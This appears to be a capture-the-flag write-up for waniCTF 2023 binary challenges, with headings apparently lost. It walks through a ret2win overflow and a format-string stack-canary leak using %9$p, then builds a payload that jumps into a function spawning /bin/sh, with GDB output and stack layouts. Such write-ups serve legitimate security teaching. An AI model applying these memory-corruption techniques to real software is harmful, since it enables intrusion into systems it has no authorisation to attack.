This is a simple buffer overflow, the aim of this challenge is to jump to the win function. The payload will be structured as follows:
Payload = PADDING + win_address()
Simple shellcode injection
[*] '/home/feedz/Desktop/waniCTF/waniCTF_2023/pwn-shell-basic/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
we can see that NX is disabled and that means we can go with shellcode injection.
the aim of this challenge is to leak the stack canary through format string vulnerability and then jump to the win function that will open /bin/sh.
while (strcmp(nope, "YES")) {
printf("You can't overwrite return address if canary is enabled.\nDo you "
"agree with me? : ");
scanf("%s", nope);
printf(nope);
}the focus is to leak stuff from the stack through printf, as I said first this will help us to leak the stack canary. we can try to fuzz the stack and try to identify the stack canary. the stack canary end in 00.
0: Do you agree with me? : %0$p
1: Do you agree with me? : 0xa
2: Do you agree with me? : (nil)
3: Do you agree with me? : 0x7f32a9619aa0
4: Do you agree with me? : (nil)
5: Do you agree with me? : 0x7fc3bb378040
6: Do you agree with me? : 0x70243625
7: Do you agree with me? : (nil)
8: Do you agree with me? : (nil)
9: Do you agree with me? : 0xef1553a888ae3b00
10: Do you agree with me? : 0x1
11: Do you agree with me? : 0x7fe97bc29d90
12: Do you agree with me? : (nil)
13: Do you agree with me? : 0x401254
14: Do you agree with me? : 0x100000000
we can see that in the first 15 occurrences only 1 ends with 00. Number 9 is our candidate
Now let's check better with GDB.
You can't overwrite return address if canary is enabled.
Do you agree with me? : %9$p
0xb2431c61d958e500
gef➤ canary
[*] .gef-2b72f5d0d9f0f218a91cd1ca5148e45923b950d5.py:L4935 'checksec' is deprecated and will be removed in a feature release. Use Elf(fname).checksec()
[+] The canary of process 16904 is at 0x7fffffffe2b9, value is 0xb2431c61d958e500yes, %9$p will be our stack canary. let's craft our payload:
Payload = buffer_padding + canary + padding_rbp + win_address
Note that win fuction starts at 0x40123d but this function will push rbp on the stack, and this will dis-align the stack. So we can pass 0x401245 directly, which is the syscall to /bin/sh.
gef➤ disas win
Dump of assembler code for function win:
0x000000000040123d <+0>: endbr64
0x0000000000401241 <+4>: push rbp
0x0000000000401242 <+5>: mov rbp,rsp
0x0000000000401245 <+8>: lea rdi,[rip+0xdbc] # 0x402008
0x000000000040124c <+15>: call 0x4010d0 <system@plt>
0x0000000000401251 <+20>: nop
0x0000000000401252 <+21>: pop rbp
0x0000000000401253 <+22>: ret
End of assembler dump.the stack alignment will look something like this:
0x007ffc9282ce08│+0x0008: "AAAAAAAAAAAAAAAA"
0x007ffc9282ce10│+0x0010: "AAAAAAAA"
0x007ffc9282ce18│+0x0018: 0x338641c2c0127900
0x007ffc9282ce20│+0x0020: 0x4242424242424242 ← $rbp
0x007ffc9282ce28│+0x0028: 0x00000000401245 → <win+8> lea rdi, [rip+0xdbc] # 0x402008just run the exploit and get the flag!